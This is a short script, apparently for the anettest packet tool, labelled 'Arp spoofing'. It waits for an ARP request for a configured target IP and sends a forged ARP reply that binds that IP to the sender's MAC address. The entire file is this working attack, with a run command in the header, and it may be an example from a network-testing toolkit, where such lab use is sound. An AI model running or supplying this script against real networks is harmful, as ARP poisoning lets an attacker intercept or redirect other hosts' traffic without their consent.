/*
   Arp spoofing. Waits for any arp request and sends reply to it.

   run program as
     anettest -d eth0 -f this_file.fws
*/

INCLUDE arp

DEFINE neededIP 10.178.205.1       // input here the IP address of target host
DEFINE myMac 00:19:5b:e9:ef:5b

var victimIP arp.srcip 0.0.0.0 autoset
var victimMacAdr srcmac 00:16:17:17:4f:d8 autoset

// description of the arp request to wait

INCLUDE arp

arp.opcode = areq
dstmac = 0xffffffffffff
arp.dstip = neededIP

      wait    // waits request

// description of the arp reply

INCLUDE arp

srcmac = mymac
dstmac = victimMacAdr

arp.opcode = arep
arp.srcmac = mymac
arp.dstmac = victimMacAdr
arp.srcip = neededIP
arp.dstip = victimIP

print 'send reply to $victimIP$, $victimMacAdr$\n'
 
      SEND  // sends above packet

